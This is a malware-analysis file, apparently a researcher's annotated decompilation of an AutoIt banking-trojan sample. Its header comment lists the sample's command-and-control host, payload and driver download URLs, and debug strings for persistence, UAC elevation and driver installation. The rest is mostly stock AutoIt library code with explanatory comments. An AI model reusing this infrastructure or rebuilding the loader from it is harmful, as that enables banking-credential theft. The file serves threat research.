Malware-Misc-RE/2019-05-15-possible-bankerflux-vk.au3
| /* | |
| MD5: f363206183d838911458139b45d0ac6d | |
| h/t @malwarehunterteam | |
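| Config (values as they appear in the tokenized dump: 39 and 40 look like the True/False tokens, and 274(...) is presumably Random(...)): | |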
| $ba3x = 40 | |
| $iport = 443 | |
| $bpersistence = 39 | |
| $sinstalldir = @HomeDrive & @HomePath | |
| $stempdir = @TempDir | |
| $busestartupfolder = 40 | |
| $sserver = "port2010kmjutre.camdvr.org" | |
| $scounterurl = "https://test.discoverthings.pw/counter4.php" | |
| $sx86 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X86.rc4" | |
| $sx64 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X64.rc4" | |
| $sdriverx86 = "https://drive.google.com/uc?authuser=0&id=1Sa-NOdSof4FcUQbUH8V9pq9URtkYnB5h&export=download" | |
| $sdriverx64 = "https://drive.google.com/uc?authuser=0&id=11iWhfhV4c49pWabl9EDcACxzXnrHU7NM&export=download" | |
| $sdriverinstaller = "https://drive.google.com/uc?authuser=0&id=1LgBlbz4opeHnm7NflOxUu2XUag0h1aQD&export=download" | |
| debuglog("Downloading datastorage.tmp") | |
| debuglog("Decrypting datastorage") | |
| debuglog("Server is visible right now") | |
| debuglog("Server is not visible right now") | |
| debuglog("Downloading driver files") | |
| debuglog("Installing driver") | |
| debuglog("Restarting machine") | |
| debuglog("Setting as startup through registry - interpreted") | |
| debuglog("Setting as startup through startup folder - interpreted") | |
| debuglog("Setting as startup through startup folder - not interpreted") | |
| debuglog("Setting as startup through registry - not interpreted") | |
| debuglog("Registering execution") | |
| debuglog("Waiting") | |
| debuglog("Running interpreted. Installing itself") | |
| debuglog("Driver is not installed") | |
| debuglog("Will request UAC") | |
| debuglog("UAC Requested. PID: " & $iproc) | |
| debuglog("Not running interpreted. Installing files") | |
| debuglog("Instancing module") | |
| debuglog("Failed to load module. Restarting...") | |
| debuglog("Module running") | |
| debuglog("Process started") | |
| debuglog("Will install itself") | |
| debuglog("Will install required files") | |
| debuglog("Will install driver") | |
| */ | |
| ; Message-box flags ($mb_*) and button/return IDs ($id*). Names and values look like AutoIt's stock MsgBoxConstants include rather than sample-specific code - confirm against the UDF. | |
| ; "2930" is the dump's token pair for what appears to be "Global Const". | |
| 2930$mb_ok = 0 | |
| 2930$mb_okcancel = 1 | |
| 2930$mb_abortretryignore = 2 | |
| 2930$mb_yesnocancel = 3 | |
| 2930$mb_yesno = 4 | |
| 2930$mb_retrycancel = 5 | |
| 2930$mb_canceltrycontinue = 6 | |
| 2930$mb_help = 16384 | |
| 2930$mb_iconstop = 16 | |
| 2930$mb_iconerror = 16 | |
| 2930$mb_iconhand = 16 | |
| 2930$mb_iconquestion = 32 | |
| 2930$mb_iconexclamation = 48 | |
| 2930$mb_iconwarning = 48 | |
| 2930$mb_iconinformation = 64 | |
| 2930$mb_iconasterisk = 64 | |
| 2930$mb_usericon = 128 | |
| 2930$mb_defbutton1 = 0 | |
| 2930$mb_defbutton2 = 256 | |
| 2930$mb_defbutton3 = 512 | |
| 2930$mb_defbutton4 = 768 | |
| 2930$mb_applmodal = 0 | |
| 2930$mb_systemmodal = 4096 | |
| 2930$mb_taskmodal = 8192 | |
| 2930$mb_default_desktop_only = 131072 | |
| 2930$mb_right = 524288 | |
| 2930$mb_rtlreading = 1048576 | |
| 2930$mb_setforeground = 65536 | |
| 2930$mb_topmost = 262144 | |
| 2930$mb_service_notification = 2097152 | |
| 2930$mb_rightjustified = $mb_right | |
| 2930$idtimeout = -1 | |
| 2930$idok = 1 | |
| 2930$idcancel = 2 | |
| 2930$idabort = 3 | |
| 2930$idretry = 4 | |
| 2930$idignore = 5 | |
| 2930$idyes = 6 | |
| 2930$idno = 7 | |
| 2930$idclose = 8 | |
| 2930$idhelp = 9 | |
| 2930$idtryagain = 10 | |
| 2930$idcontinue = 11 | |
| ; String-handling option constants ($str_*, $sb_*, $se_*). They look like AutoIt's stock StringConstants include, not sample-specific code - confirm against the UDF. | |
| 2930$str_nocasesense = 0 | |
| 2930$str_casesense = 1 | |
| 2930$str_nocasesensebasic = 2 | |
| 2930$str_stripleading = 1 | |
| 2930$str_striptrailing = 2 | |
| 2930$str_stripspaces = 4 | |
| 2930$str_stripall = 8 | |
| 2930$str_chrsplit = 0 | |
| 2930$str_entiresplit = 1 | |
| 2930$str_nocount = 2 | |
| 2930$str_regexpmatch = 0 | |
| 2930$str_regexparraymatch = 1 | |
| 2930$str_regexparrayfullmatch = 2 | |
| 2930$str_regexparrayglobalmatch = 3 | |
| 2930$str_regexparrayglobalfullmatch = 4 | |
| 2930$str_endisstart = 0 | |
| 2930$str_endnotstart = 1 | |
| 2930$sb_ansi = 1 | |
| 2930$sb_utf16le = 2 | |
| 2930$sb_utf16be = 3 | |
| 2930$sb_utf8 = 4 | |
| 2930$se_utf16 = 0 | |
| 2930$se_ansi = 1 | |
| 2930$se_utf8 = 2 | |
| 2930$str_utf16 = 0 | |
| 2930$str_ucs2 = 1 | |
| ; Flag bits for FormatMessageW; _winapi_getlasterrormessage combines the allocate_buffer and from_system values. | |
| 2930$format_message_allocate_buffer = 256 | |
| 2930$format_message_ignore_inserts = 512 | |
| 2930$format_message_from_string = 1024 | |
| 2930$format_message_from_hmodule = 2048 | |
| 2930$format_message_from_system = 4096 | |
| 2930$format_message_argument_array = 8192 | |
| ; _winapi_beep: calls kernel32!Beep with a frequency and a duration (defaults 500 and 1000). | |
| ; Numeric prefixes are decompiler token IDs: 32/33 appear to be Func/EndFunc, 28 Local, 58 DllCall, 34 Return, 287 SetError, 40 False. | |
| 32_winapi_beep($ifreq = 500, $iduration = 1000) | |
| 28$aresult = 58("kernel32.dll", "bool", "Beep", "dword", $ifreq, "dword", $iduration) | |
| ; If the call itself failed, pass @error/@extended on and return the false token. | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] | |
| 33 | |
| ; _winapi_formatmessage: thin wrapper over kernel32!FormatMessageW. | |
| ; $pbuffer carries token 36 (apparently ByRef): when the caller passes a string, the formatted text is written back into it. | |
| ; Returns element [0] of the call result; on failure returns 0 with @error offset by 10. | |
| 32_winapi_formatmessage($iflags, $psource, $imessageid, $ilanguageid, 36$pbuffer, $isize, $varguments) | |
| 28$sbuffertype = "struct*" | |
| ; 233(...) is presumably IsString: a string argument switches the buffer type to "wstr". | |
| 4233($pbuffer)5$sbuffertype = "wstr" | |
| 28$aresult = 58("kernel32.dll", "dword", "FormatMessageW", "dword", $iflags, "struct*", $psource, "dword", $imessageid, "dword", $ilanguageid, $sbuffertype, $pbuffer, "dword", $isize, "ptr", $varguments) | |
| ; "4 <a> 2 3 <b> 5" reads as If <a> Or Not <b> Then: failure of the call or a zero result. | |
| 4@error23$aresult[0]534287(@error + 10, @extended, 0) | |
| ; Element [5] is the fifth call argument, i.e. the buffer after the call. | |
| 4$sbuffertype = "wstr"5$pbuffer = $aresult[5] | |
| 34$aresult[0] | |
| 33 | |
| ; _winapi_geterrormessage: looks up the text for error code $icode through FormatMessageW. | |
| ; The literal flag 4096 equals $format_message_from_system; the second 4096 is the buffer size passed to the call. | |
| ; The two trailing parameters snapshot the caller's @error/@extended so they can be restored on return. | |
| 32_winapi_geterrormessage($icode, $ilanguage = 0, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$aret = 58("kernel32.dll", "dword", "FormatMessageW", "dword", 4096, "ptr", 0, "dword", $icode, "dword", $ilanguage, "wstr", "", "dword", 4096, "ptr", 0) | |
| ; Failure: return an empty string with the call's own @error/@extended. | |
| 4@error23$aret[0]534287(@error, @extended, "") | |
| ; 327(...) is presumably StringRegExpReplace: strips trailing LF, CR and comma characters from the message. | |
| 34287($_icurrenterror, $_icurrentextended, 327($aret[5], "[" & @LF & "," & @CR & "]*\Z", "")) | |
| 33 | |
| ; _winapi_getlasterror: returns the result of kernel32!GetLastError. | |
| ; The default-valued parameters capture the caller's @error/@extended, which are handed back unchanged through 287 (apparently SetError). | |
| 32_winapi_getlasterror(30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$aresult = 58("kernel32.dll", "dword", "GetLastError") | |
| 34287($_icurrenterror, $_icurrentextended, $aresult[0]) | |
| 33 | |
| ; _winapi_getlasterrormessage: returns the system message text for the current last-error code. | |
| ; FormatMessageW is asked to allocate the buffer itself, so the function reads the text from the returned pointer and then frees it with LocalFree. | |
| ; Returns "" with a negated @error when the lookup fails; otherwise restores the caller's @error/@extended. | |
| 32_winapi_getlasterrormessage(30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$ilasterror = _winapi_getlasterror() | |
| ; 65(...) is presumably DllStructCreate: a one-pointer struct that receives the address of the allocated buffer. | |
| 28$tbufferptr = 65("ptr") | |
| ; 19(...) is presumably BitOR of the allocate_buffer and from_system flags. | |
| 28$ncount = _winapi_formatmessage(19($format_message_allocate_buffer, $format_message_from_system), 0, $ilasterror, 0, $tbufferptr, 0, 0) | |
| 4@error534287(-@error, @extended, "") | |
| 28$stext = "" | |
| ; 66(...) is presumably DllStructGetData: fetch the pointer value. | |
| 28$pbuffer = 66($tbufferptr, 1) | |
| 4$pbuffer5 | |
| 4$ncount > 05 | |
| ; Overlay a wchar array of $ncount + 1 elements on the returned buffer and read it as text. | |
| 28$tbuffer = 65("wchar[" & ($ncount + 1) & "]", $pbuffer) | |
| $stext = 66($tbuffer, 1) | |
| ; Drop a trailing CRLF (330/337 are presumably StringRight/StringTrimRight). | |
| 4330($stext, 2) = @CRLF5$stext = 337($stext, 2) | |
| 8 | |
| ; Release the buffer the API allocated. | |
| 58("kernel32.dll", "handle", "LocalFree", "handle", $pbuffer) | |
| 8 | |
| 34287($_icurrenterror, $_icurrentextended, $stext) | |
| 33 | |
| ; _winapi_messagebeep: maps $itype 1..6 to a sound value and passes it to user32!MessageBeep. | |
| ; Here 23/21/24 read as Switch/Case/EndSwitch, so "211" is "Case 1", "212" is "Case 2", and so on. | |
| ; NOTE(review): there is no default case, so $isound stays unassigned for any other $itype. | |
| 32_winapi_messagebeep($itype = 1) | |
| 28$isound | |
| 23$itype | |
| 211 | |
| $isound = 0 | |
| 212 | |
| $isound = 16 | |
| 213 | |
| $isound = 32 | |
| 214 | |
| $isound = 48 | |
| 215 | |
| $isound = 64 | |
| 216 | |
| $isound = -1 | |
| 24 | |
| 28$aresult = 58("user32.dll", "bool", "MessageBeep", "uint", $isound) | |
| ; A failed call returns the false token with @error/@extended passed on. | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] | |
| 33 | |
| ; _winapi_msgbox: shows a message box with the given flags, title and text (a space is appended to the text). | |
| ; Followed by "(", a number is a built-in function index rather than a keyword: 23(0) and 249(...) are presumably BlockInput(0) and MsgBox(...) - confirm against the token table. | |
| 32_winapi_msgbox($iflags, $stitle, $stext) | |
| 23(0) | |
| 249($iflags, $stitle, $stext & " ") | |
| 33 | |
| ; _winapi_setlasterror: passes $ierrorcode to kernel32!SetLastError. | |
| ; The caller's @error/@extended are restored on return; the returned token 42 is presumably Null. | |
| 32_winapi_setlasterror($ierrorcode, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 58("kernel32.dll", "none", "SetLastError", "dword", $ierrorcode) | |
| 34287($_icurrenterror, $_icurrentextended, 42) | |
| 33 | |
| ; _winapi_showerror: shows $stext in a system-modal box titled "Error". | |
| ; $bexit defaults to token 39 (apparently True); when set, the script ends afterwards (35 reads as Exit). | |
| 32_winapi_showerror($stext, $bexit = 39) | |
| ; 23(0) and 249(...) are presumably BlockInput(0) and MsgBox(...). | |
| 23(0) | |
| 249($mb_systemmodal, "Error", $stext & " ") | |
| 4$bexit535 | |
| 33 | |
| ; _winapi_showlasterror: shows the last-error code and its message text in a message box. | |
| ; $babort defaults to token 40 (apparently False); when it is set and the code is non-zero, the script exits with that code. | |
| ; Returns 1 and restores the caller's @error/@extended. | |
| 32_winapi_showlasterror($stext = "", $babort = 40, $ilanguage = 0, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$serror | |
| 28$ilasterror = _winapi_getlasterror() | |
| ; "91" reads as While 1: try the requested language, retry once with language 0 if that lookup fails, then leave the loop (18 reads as ExitLoop, 10 as WEnd). | |
| 91 | |
| $serror = _winapi_geterrormessage($ilasterror, $ilanguage) | |
| 4@error1$ilanguage5 | |
| $ilanguage = 0 | |
| 6 | |
| 18 | |
| 8 | |
| 10 | |
| ; 333(...) is presumably StringStripWS: caller text that is not blank is kept and separated from the system message by two line breaks. | |
| 4333($stext, $str_stripleading + $str_striptrailing)5 | |
| $stext &= @CRLF & @CRLF | |
| 6 | |
| $stext = "" | |
| 8 | |
| ; Flags are 262144 ($mb_topmost) combined with 16 shifted by -2 * (Not $ilasterror); the error code is passed as the title. 19/21 are presumably BitOR/BitShift. | |
| _winapi_msgbox(19(262144, 21(16, -2 * (3$ilasterror))), $ilasterror, $stext & $serror) | |
| 4$ilasterror5 | |
| ; Put the code back as the thread's last error. | |
| _winapi_setlasterror($ilasterror) | |
| 4$babort5 | |
| 35$ilasterror | |
| 8 | |
| 8 | |
| 34287($_icurrenterror, $_icurrentextended, 1) | |
| 33 | |
| ; _winapi_showmsg: shows $stext in a system-modal box titled "Information" via _winapi_msgbox. | |
| 32_winapi_showmsg($stext) | |
| _winapi_msgbox($mb_systemmodal, "Information", $stext) | |
| 33 | |
| ; __comerrorformating: builds a multi-line text description of a COM error object and returns it. | |
| ; Each line starts with $sprefix (default @TAB) and reports one property: number, descriptions, source, help file/context, last DLL error and return code. | |
| 32__comerrorformating(36$ocomerror, $sprefix = @TAB) | |
| ; "2830" reads as Local Const: a function-local copy of the strip-trailing flag. | |
| 2830$str_striptrailing = 2 | |
| ; 199(...) is presumably Hex and 333(...) StringStripWS. | |
| 28$serror = "COM Error encountered in " & @ScriptName & " (" & $ocomerror.scriptline & ") :" & @CRLF & $sprefix & "Number " & @TAB & "= 0x" & 199($ocomerror.number, 8) & " (" & $ocomerror.number & ")" & @CRLF & $sprefix & "WinDescription" & @TAB & "= " & 333($ocomerror.windescription, $str_striptrailing) & @CRLF & $sprefix & "Description " & @TAB & "= " & 333($ocomerror.description, $str_striptrailing) & @CRLF & $sprefix & "Source " & @TAB & "= " & $ocomerror.source & @CRLF & $sprefix & "HelpFile " & @TAB & "= " & $ocomerror.helpfile & @CRLF & $sprefix & "HelpContext " & @TAB & "= " & $ocomerror.helpcontext & @CRLF & $sprefix & "LastDllError " & @TAB & "= " & $ocomerror.lastdllerror & @CRLF & $sprefix & "Retcode " & @TAB & "= 0x" & 199($ocomerror.retcode) | |
| 34$serror | |
| 33 | |
| ; File-handling constants: copy/open modes ($fc_*, $fo_*), dialog flags ($fd_*), Win32 attribute, share and access bits ($file_*, $generic_*), version-info keys ($fv_*) and listing options ($flta_*, $fltar_*, $path_*). | |
| ; They look like AutoIt's stock FileConstants include rather than sample-specific code - confirm against the UDF. 19(...) on the combined values is presumably BitOR. | |
| 2930$fc_nooverwrite = 0 | |
| 2930$fc_overwrite = 1 | |
| 2930$fc_createpath = 8 | |
| 2930$ft_modified = 0 | |
| 2930$ft_created = 1 | |
| 2930$ft_accessed = 2 | |
| 2930$ft_array = 0 | |
| 2930$ft_string = 1 | |
| 2930$fsf_createbutton = 1 | |
| 2930$fsf_newdialog = 2 | |
| 2930$fsf_editcontrol = 4 | |
| 2930$ft_nonrecursive = 0 | |
| 2930$ft_recursive = 1 | |
| 2930$fo_read = 0 | |
| 2930$fo_append = 1 | |
| 2930$fo_overwrite = 2 | |
| 2930$fo_createpath = 8 | |
| 2930$fo_binary = 16 | |
| 2930$fo_unicode = 32 | |
| 2930$fo_utf16_le = 32 | |
| 2930$fo_utf16_be = 64 | |
| 2930$fo_utf8 = 128 | |
| 2930$fo_utf8_nobom = 256 | |
| 2930$fo_ansi = 512 | |
| 2930$fo_utf16_le_nobom = 1024 | |
| 2930$fo_utf16_be_nobom = 2048 | |
| 2930$fo_utf8_full = 16384 | |
| 2930$fo_fullfile_detect = 16384 | |
| 2930$eof = -1 | |
| 2930$fd_filemustexist = 1 | |
| 2930$fd_pathmustexist = 2 | |
| 2930$fd_multiselect = 4 | |
| 2930$fd_promptcreatenew = 8 | |
| 2930$fd_promptoverwrite = 16 | |
| 2930$create_new = 1 | |
| 2930$create_always = 2 | |
| 2930$open_existing = 3 | |
| 2930$open_always = 4 | |
| 2930$truncate_existing = 5 | |
| 2930$invalid_set_file_pointer = -1 | |
| 2930$file_begin = 0 | |
| 2930$file_current = 1 | |
| 2930$file_end = 2 | |
| 2930$file_attribute_readonly = 1 | |
| 2930$file_attribute_hidden = 2 | |
| 2930$file_attribute_system = 4 | |
| 2930$file_attribute_directory = 16 | |
| 2930$file_attribute_archive = 32 | |
| 2930$file_attribute_device = 64 | |
| 2930$file_attribute_normal = 128 | |
| 2930$file_attribute_temporary = 256 | |
| 2930$file_attribute_sparse_file = 512 | |
| 2930$file_attribute_reparse_point = 1024 | |
| 2930$file_attribute_compressed = 2048 | |
| 2930$file_attribute_offline = 4096 | |
| 2930$file_attribute_not_content_indexed = 8192 | |
| 2930$file_attribute_encrypted = 16384 | |
| 2930$file_share_read = 1 | |
| 2930$file_share_write = 2 | |
| 2930$file_share_delete = 4 | |
| 2930$file_share_readwrite = 19($file_share_read, $file_share_write) | |
| 2930$file_share_any = 19($file_share_read, $file_share_write, $file_share_delete) | |
| 2930$generic_all = 268435456 | |
| 2930$generic_execute = 536870912 | |
| 2930$generic_write = 1073741824 | |
| 2930$generic_read = -2147483648 | |
| 2930$generic_readwrite = 19($generic_read, $generic_write) | |
| 2930$file_encoding_utf16le = 32 | |
| 2930$fe_entire_utf8 = 1 | |
| 2930$fe_partialfirst_utf8 = 2 | |
| 2930$fn_fullpath = 0 | |
| 2930$fn_relativepath = 1 | |
| 2930$fv_comments = "Comments" | |
| 2930$fv_companyname = "CompanyName" | |
| 2930$fv_filedescription = "FileDescription" | |
| 2930$fv_fileversion = "FileVersion" | |
| 2930$fv_internalname = "InternalName" | |
| 2930$fv_legalcopyright = "LegalCopyright" | |
| 2930$fv_legaltrademarks = "LegalTrademarks" | |
| 2930$fv_originalfilename = "OriginalFilename" | |
| 2930$fv_productname = "ProductName" | |
| 2930$fv_productversion = "ProductVersion" | |
| 2930$fv_privatebuild = "PrivateBuild" | |
| 2930$fv_specialbuild = "SpecialBuild" | |
| 2930$frta_nocount = 0 | |
| 2930$frta_count = 1 | |
| 2930$frta_intarrays = 2 | |
| 2930$frta_entiresplit = 4 | |
| 2930$flta_filesfolders = 0 | |
| 2930$flta_files = 1 | |
| 2930$flta_folders = 2 | |
| 2930$fltar_filesfolders = 0 | |
| 2930$fltar_files = 1 | |
| 2930$fltar_folders = 2 | |
| 2930$fltar_nohidden = 4 | |
| 2930$fltar_nosystem = 8 | |
| 2930$fltar_nolink = 16 | |
| 2930$fltar_norecur = 0 | |
| 2930$fltar_recur = 1 | |
| 2930$fltar_nosort = 0 | |
| 2930$fltar_sort = 1 | |
| 2930$fltar_fastsort = 2 | |
| 2930$fltar_nopath = 0 | |
| 2930$fltar_relpath = 1 | |
| 2930$fltar_fullpath = 2 | |
| 2930$path_original = 0 | |
| 2930$path_drive = 1 | |
| 2930$path_directory = 2 | |
| 2930$path_filename = 3 | |
| 2930$path_extension = 4 | |
| ; CryptoAPI constants used by the _crypt_* functions: provider types, context/key flags, hash parameters and ALG_ID values ($calg_rc4 = 26625 = 0x6801, $calg_md5 = 32771 = 0x8003). | |
| ; The block appears to match AutoIt's stock Crypt.au3 include, so these names and values alone say little about the sample; which algorithm it actually uses is decided by callers outside this section. | |
| 2930$prov_rsa_full = 1 | |
| 2930$prov_rsa_aes = 24 | |
| 2930$crypt_verifycontext = -268435456 | |
| 2930$hp_hashsize = 4 | |
| 2930$hp_hashval = 2 | |
| 2930$crypt_exportable = 1 | |
| 2930$crypt_userdata = 1 | |
| 2930$kp_algid = 7 | |
| 2930$calg_md2 = 32769 | |
| 2930$calg_md4 = 32770 | |
| 2930$calg_md5 = 32771 | |
| 2930$calg_sha1 = 32772 | |
| 2930$calg_sha_256 = 32780 | |
| 2930$calg_sha_384 = 32781 | |
| 2930$calg_sha_512 = 32782 | |
| 2930$calg_3des = 26115 | |
| 2930$calg_aes_128 = 26126 | |
| 2930$calg_aes_192 = 26127 | |
| 2930$calg_aes_256 = 26128 | |
| 2930$calg_des = 26113 | |
| 2930$calg_rc2 = 26114 | |
| 2930$calg_rc4 = 26625 | |
| 2930$calg_userkey = 0 | |
| ; Shared state for the crypt helpers, read and written only through the __crypt_* accessors: [0] reference count, [1] Advapi32 DLL handle, [2] provider context. | |
| 29$__g_acryptinternaldata[3] | |
| ; _crypt_startup: reference-counted initialisation of the shared CryptoAPI state. | |
| ; The first call opens Advapi32.dll and acquires a provider context ($prov_rsa_aes, $crypt_verifycontext); every successful call increments the count. | |
| ; Returns token 39 (apparently True); on failure returns token 40 (apparently False) with @error 1001 (DLL open failed) or 1002 and up (CryptAcquireContext failed). | |
| 32_crypt_startup() | |
| 4__crypt_refcount() = 05 | |
| ; 64(...) is presumably DllOpen; -1 signals failure. | |
| 28$hadvapi32 = 64("Advapi32.dll") | |
| 4$hadvapi32 = -1534287(1001, 0, 40) | |
| __crypt_dllhandleset($hadvapi32) | |
| 28$iproviderid = $prov_rsa_aes | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext) | |
| 4@error23$aret[0]5 | |
| 28$ierror = @error + 1002, $iextended = @extended | |
| ; When the API itself reported failure, carry GetLastError in @extended. | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| ; 63(...) is presumably DllClose: release the DLL handle before returning the error. | |
| 63(__crypt_dllhandle()) | |
| 34287($ierror, $iextended, 40) | |
| 6 | |
| ; Element [1] is the "handle*" out-parameter, i.e. the acquired context. | |
| __crypt_contextset($aret[1]) | |
| 8 | |
| 8 | |
| __crypt_refcountinc() | |
| 3439 | |
| 33 | |
| ; _crypt_shutdown: counterpart of _crypt_startup. Decrements the reference count and, when it reaches 0, releases the provider context and closes the Advapi32 handle (63 is presumably DllClose). | |
| 32_crypt_shutdown() | |
| __crypt_refcountdec() | |
| 4__crypt_refcount() = 05 | |
| 58(__crypt_dllhandle(), "bool", "CryptReleaseContext", "handle", __crypt_context(), "dword", 0) | |
| 63(__crypt_dllhandle()) | |
| 8 | |
| 33 | |
| ; _crypt_derivekey: turns a password into a CryptoAPI key handle for algorithm $ialgid. | |
| ; The password bytes are hashed once with $ihashpasswordid (default $calg_md5) and the hash is passed to CryptDeriveKey with the $crypt_exportable flag; no salt or iteration count appears in this code. | |
| ; Returns the key handle, or -1 with @error offset by 10 (create hash), 20 (hash data) or 30 (derive key). | |
| ; The provider reference taken by _crypt_startup is not released here; _crypt_destroykey calls _crypt_shutdown. | |
| 32_crypt_derivekey($vpassword, $ialgid, $ihashpasswordid = $calg_md5) | |
| 28$aret = 0, $tbuff = 0, $hcrypthash = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; "11" ... "1239" reads as Do ... Until True: a single-pass loop, so "18" (ExitLoop) jumps straight to the cleanup below. | |
| 11 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihashpasswordid, "ptr", 0, "dword", 0, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 10 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $hcrypthash = $aret[5] | |
| ; Copy the password into a byte buffer of the same length (14/65/69 are presumably BinaryLen/DllStructCreate/DllStructSetData). | |
| $tbuff = 65("byte[" & 14($vpassword) & "]") | |
| 69($tbuff, 1, $vpassword) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $tbuff, "dword", 68($tbuff), "dword", $crypt_userdata) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 20 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialgid, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 30 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| ; Element [5] is the "handle*" out-parameter: the derived key. | |
| $vreturn = $aret[5] | |
| 1239 | |
| ; Cleanup on every path: the intermediate hash object is destroyed. | |
| 4$hcrypthash <> 0558(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash) | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| ; _crypt_destroykey: destroys a key handle with CryptDestroyKey and then calls _crypt_shutdown to drop one provider reference. | |
| ; Returns token 39 (apparently True) on success, or token 40 (apparently False) with @error offset by 10. | |
| 32_crypt_destroykey($hcryptkey) | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptDestroyKey", "handle", $hcryptkey) | |
| ; Capture the error state before _crypt_shutdown can change it. | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| _crypt_shutdown() | |
| 4$ierror23$aret[0]5 | |
| 34287($ierror + 10, $iextended, 40) | |
| 6 | |
| 3439 | |
| 8 | |
| 33 | |
| ; _crypt_encryptdata: encrypts $vdata with CryptEncrypt and returns the ciphertext as binary. | |
| ; $vcryptkey is a password when $ialgid names an algorithm (a key is then derived and destroyed here) or an existing key handle when $ialgid is $calg_userkey. | |
| ; $bfinal (default token 39, apparently True) is passed to the API as the final-block flag. | |
| ; Returns -1 with @error set on failure: the key-derivation error, or 50 and up (size query) / 60 and up (encryption). | |
| 32_crypt_encryptdata($vdata, $vcryptkey, $ialgid, $bfinal = 39) | |
| ; Here 23/21/24 read as Switch/Case/EndSwitch. For a caller-supplied key the algorithm is looked up; an RC4 key falls through (25, apparently ContinueCase) to the RC4 case, which returns empty binary for empty input without calling the API. | |
| 23$ialgid | |
| 21$calg_userkey | |
| 28$icalgused = __crypt_getcalgfromcryptkey($vcryptkey) | |
| 4@error534287(@error, @extended, -1) | |
| 4$icalgused = $calg_rc4525 | |
| 21$calg_rc4 | |
| 414($vdata) = 0534287(0, 0, 13("")) | |
| 24 | |
| 28$ireqbuffsize = 0, $aret = 0, $tbuff = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| ; Single-pass Do ... Until True loop: "18" (ExitLoop) jumps to the cleanup at the end. | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| ; Replace the password with a key handle derived from it. | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 8 | |
| ; First call passes a null buffer: only the required output size comes back, in element [6]. | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "ptr", 0, "dword*", 14($vdata), "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 50 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $ireqbuffsize = $aret[6] | |
| ; Allocate the reported size plus one byte, copy the plaintext in, and encrypt in place. | |
| $tbuff = 65("byte[" & $ireqbuffsize + 1 & "]") | |
| 69($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $tbuff, "dword*", 14($vdata), "dword", $ireqbuffsize) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 60 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| ; 15(...) is presumably BinaryMid: return exactly $ireqbuffsize bytes of the buffer. | |
| $vreturn = 15(66($tbuff, 1), 1, $ireqbuffsize) | |
| 1239 | |
| ; Cleanup: destroy the key only if it was derived here, then drop the provider reference. | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| ; _crypt_decryptdata: decrypts $vdata with CryptDecrypt and returns the plaintext as binary. | |
| ; $vcryptkey is a password when $ialgid names an algorithm (a key is then derived and destroyed here) or an existing key handle when $ialgid is $calg_userkey. | |
| ; Returns -1 with @error set on failure: the key-derivation error, or 70 and up when CryptDecrypt fails. | |
| ; Analyst note: the block appears to match AutoIt's stock Crypt.au3; the key and algorithm the sample uses are supplied by callers outside this section. | |
| 32_crypt_decryptdata($vdata, $vcryptkey, $ialgid, $bfinal = 39) | |
| ; Same pre-check as in _crypt_encryptdata: a caller-supplied RC4 key falls through to the RC4 case, which returns empty binary for empty input. | |
| 23$ialgid | |
| 21$calg_userkey | |
| 28$icalgused = __crypt_getcalgfromcryptkey($vcryptkey) | |
| 4@error534287(@error, @extended, -1) | |
| 4$icalgused = $calg_rc4525 | |
| 21$calg_rc4 | |
| 414($vdata) = 0534287(0, 0, 13("")) | |
| 24 | |
